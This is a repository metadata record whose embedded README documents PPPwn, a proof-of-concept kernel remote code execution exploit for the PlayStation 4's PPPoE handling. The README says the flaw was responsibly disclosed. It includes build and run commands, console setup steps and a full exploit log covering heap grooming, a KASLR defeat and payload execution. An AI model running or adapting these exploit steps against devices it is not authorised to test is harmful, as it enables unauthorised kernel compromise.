{"id":13650903,"url":"https://github.com/TheOfficialFloW/PPPwn","last_synced_at":"2025-04-22T18:33:12.123Z","repository":{"id":237291996,"uuid":"794185166","full_name":"TheOfficialFloW/PPPwn","owner":"TheOfficialFloW","description":"PPPwn - PlayStation 4 PPPoE RCE","archived":false,"fork":false,"pushed_at":"2024-06-16T15:58:16.000Z","size":32,"stargazers_count":2585,"open_issues_count":13,"forks_count":371,"subscribers_count":115,"default_branch":"master","last_synced_at":"2024-10-29T15:34:19.290Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TheOfficialFloW.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-30T16:09:20.000Z","updated_at":"2024-10-29T06:48:14.000Z","dependencies_parsed_at":"2024-06-16T17:55:22.360Z","dependency_job_id":null,"html_url":"https://github.com/TheOfficialFloW/PPPwn","commit_stats":null,"previous_names":["theofficialflow/pppwn"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheOfficialFloW%2FPPPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheOfficialFloW%2FPPPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheOfficialFloW%2FPPPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheOfficialFloW%2FPPPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TheOfficialFloW","download_url":"https://codeload.github.com/TheOfficialFloW/PPPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223903240,"owners_count":17222501,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T02:00:42.335Z","updated_at":"2024-11-10T01:31:23.043Z","avatar_url":"https://github.com/TheOfficialFloW.png","language":"Python","readme":"# PPPwn - PlayStation 4 PPPoE RCE\nPPPwn is a kernel remote code execution exploit for PlayStation 4 up to FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation.\n\nSupported versions are:\n- FW 7.00 / 7.01 / 7.02\n- FW 7.50 / 7.51 / 7.55\n- FW 8.00 / 8.01 / 8.03\n- FW 8.50 / 8.52\n- FW 9.00\n- FW 9.03 / 9.04\n- FW 9.50 / 9.51 / 9.60\n- FW 10.00 / 10.01\n- FW 10.50 / 10.70 / 10.71\n- FW 11.00\n- more can be added (PRs are welcome)\n\nThe exploit only prints `PPPwned` on your PS4 as a proof-of-concept. In order to launch Mira or similar homebrew enablers, the `stage2.bin` payload needs to be adapted.\n\n## Requirements\n- A computer with an Ethernet port\n  - USB adapter also works\n- Ethernet cable\n- Linux\n  - You can use VirtualBox to create a Linux VM with `Bridged Adapter` as network adapter to use the ethernet port in the VM.\n- Python3 and gcc installed\n\n## Usage\n\nOn your computer, clone the repository:\n\n```sh\ngit clone --recursive https://github.com/TheOfficialFloW/PPPwn\n```\n\nChange the directory to the cloned repository:\n\n```sh\ncd PPPwn\n```\n\nInstall the requirements:\n\n```sh\nsudo pip install -r requirements.txt\n```\n\nCompile the payloads:\n\n```sh\nmake -C stage1 FW=1100 clean \u0026\u0026 make -C stage1 FW=1100\nmake -C stage2 FW=1100 clean \u0026\u0026 make -C stage2 FW=1100\n```\n\nFor other firmwares, e.g. FW 9.00, pass `FW=900`.\n\nDO NOT RUN the exploit just yet (don't press Enter yet) but prepare this command on your prompt (see `ifconfig` for the correct interface):\n\n```sh\nsudo python3 pppwn.py --interface=enp0s3 --fw=1100\n```\n\nFor other firmwares, e.g. FW 9.00, pass `--fw=900`.\n\nOn your PS4:\n\n- Go to `Settings` and then `Network`\n- Select `Set Up Internet connection` and choose `Use a LAN Cable`\n- Choose `Custom` setup and choose `PPPoE` for `IP Address Settings`\n- Enter anything for `PPPoE User ID` and `PPPoE Password`\n- Choose `Automatic` for `DNS Settings` and `MTU Settings`\n- Choose `Do Not Use` for `Proxy Server`\n\n- Now, simultaneously press the 'X' button on your controller on `Test Internet Connection` and 'Enter' on your keyboard (on the computer you have your Python script ready to run).\n\nALWAYS wait for the console to show the message \"Cannot connect to network: (NW-31274-7)\" before trying this PPPOE injection again.\n\nIf the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on `Test Internet Connection`. Kill the `pppwn.py` script and run it again on your computer, and then click on `Test Internet Connection` on your PS4: always simultaneously.\n\n\nIf the exploit works, you should see an output similar to below, and you should see `Cannot connect to network.` followed by `PPPwned` printed on your PS4, or the other way around. \n\n### Example run\n\n```sh\n[+] PPPwn - PlayStation 4 PPPoE RCE by theflow\n[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin\n\n[+] STAGE 0: Initialization\n[*] Waiting for PADI...\n[+] pppoe_softc: 0xffffabd634beba00\n[+] Target MAC: xx:xx:xx:xx:xx:xx\n[+] Source MAC: 07:ba:be:34:d6:ab\n[+] AC cookie length: 0x4e0\n[*] Sending PADO...\n[*] Waiting for PADR...\n[*] Sending PADS...\n[*] Waiting for LCP configure request...\n[*] Sending LCP configure ACK...\n[*] Sending LCP configure request...\n[*] Waiting for LCP configure ACK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure NAK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure ACK...\n[*] Sending IPCP configure request...\n[*] Waiting for IPCP configure ACK...\n[*] Waiting for interface to be ready...\n[+] Target IPv6: fe80::2d9:d1ff:febc:83e4\n[+] Heap grooming...done\n\n[+] STAGE 1: Memory corruption\n[+] Pinning to CPU 0...done\n[*] Sending malicious LCP configure request...\n[*] Waiting for LCP configure request...\n[*] Sending LCP configure ACK...\n[*] Sending LCP configure request...\n[*] Waiting for LCP configure ACK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure NAK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure ACK...\n[*] Sending IPCP configure request...\n[*] Waiting for IPCP configure ACK...\n[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141\n\n[+] STAGE 2: KASLR defeat\n[*] Defeating KASLR...\n[+] pppoe_softc_list: 0xffffffff884de578\n[+] kaslr_offset: 0x3ffc000\n\n[+] STAGE 3: Remote code execution\n[*] Sending LCP terminate request...\n[*] Waiting for PADI...\n[+] pppoe_softc: 0xffffabd634beba00\n[+] Target MAC: xx:xx:xx:xx:xx:xx\n[+] Source MAC: 97:df:ea:86:ff:ff\n[+] AC cookie length: 0x511\n[*] Sending PADO...\n[*] Waiting for PADR...\n[*] Sending PADS...\n[*] Triggering code execution...\n[*] Waiting for stage1 to resume...\n[*] Sending PADT...\n[*] Waiting for PADI...\n[+] pppoe_softc: 0xffffabd634be9200\n[+] Target MAC: xx:xx:xx:xx:xx:xx\n[+] AC cookie length: 0x0\n[*] Sending PADO...\n[*] Waiting for PADR...\n[*] Sending PADS...\n[*] Waiting for LCP configure request...\n[*] Sending LCP configure ACK...\n[*] Sending LCP configure request...\n[*] Waiting for LCP configure ACK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure NAK...\n[*] Waiting for IPCP configure request...\n[*] Sending IPCP configure ACK...\n[*] Sending IPCP configure request...\n[*] Waiting for IPCP configure ACK...\n\n[+] STAGE 4: Arbitrary payload execution\n[*] Sending stage2 payload...\n[+] Done!\n```\n\n## Notes for Mac Apple Silicon Users (arm64 / aarch64)\nThe code will not compile on Apple Silicon and requires AMD64 architecture.\nThere is a workaround using docker which will build the bin files required.\nClone this repository to your mac system, then from the repo folder run `./build-macarm.sh`. This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders. To build the binaries for a different version, i.e. 900, run the command as such: `./build-macarm.sh 900`. Once built, copy this folder structure into the Linux VM and execute as instructed above.\nThis has been tested using VMware Fusion 13.5.1, with the VM Guest as Ubuntu 24.04, and the host machine is MacOS 14.4.1\n","funding_links":[],"categories":["Exploits","Python"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheOfficialFloW%2FPPPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTheOfficialFloW%2FPPPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheOfficialFloW%2FPPPwn/lists"}